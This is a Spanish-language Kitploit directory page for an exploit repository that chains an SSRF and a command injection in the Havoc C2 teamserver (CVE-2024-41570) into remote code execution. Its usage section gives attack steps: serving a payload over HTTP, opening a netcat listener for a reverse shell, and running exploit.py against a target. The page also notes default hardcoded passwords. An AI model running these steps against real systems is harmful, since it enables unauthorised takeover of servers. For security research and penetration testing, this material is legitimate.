Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-41570-Havoc-C2-RCE — Esto es un RCE encadenado en el framework Havoc C2 utilizando los PoCs de github.com/chebuya y github.com/IncludeSecurity | Kitploit
Herramientas/GitHubGitHub/leo-mitch/cve-2024-41570-havoc-c2-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed Teaming
GitHubleo-mitch/cve-2024-41570-havoc-c2-rce

CVE-2024-41570-Havoc-C2-RCE

Esto es un RCE encadenado en el framework Havoc C2 utilizando los PoCs de github.com/chebuya y github.com/IncludeSecurity

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
3hace 1 añoAún no revisado

Havoc-C2-RCE (CVE-2024-41570)

Este es un RCE encadenado (CVE-2024-41570) en el framework Havoc C2.

Inyección de comandos: Havoc es vulnerable a la inyección de comandos, lo que permite a un usuario autenticado ejecutar comandos en el Teamserver. Afecta a las versiones 0.3 hasta la última versión 0.6. El perfil predeterminado de Havoc contiene contraseñas codificadas, por lo que un operador de C2 que descuidadamente use el perfil predeterminado en una red pública puede ser explotado inmediatamente.

SSRF: Esta vulnerabilidad se explota suplantando el registro y los checkins de un agente demonio para abrir un socket TCP en el teamserver y leer/escribir datos desde él. Esto permite a los atacantes filtrar las IPs de origen de los teamservers y mucho más.

Cadena: Abusar del SSRF para entregar un payload autenticado de inyección de comandos.

Cómo usar

2025-01-19 20-01-34

root@kitploit:~
1. Modify the IP, USER and PASSWORD in the exploit.py file.
2. Modify IP in payload.sh

-> python3 -m venv myenv && source myenv/bin/activate
-> pip3 install -r requirements.txt
-> chmox +x payload.sh
-> python3 -m http.server (On another terminal)
-> nc -lvnp 4444 (On another terminal)

# Run the exploit
(myenv) -> python3 exploit.py -t https://site.com -i 0.0.0.0 -p 12345

Créditos para @chebuya y @Hyperreality

Descargar herramienta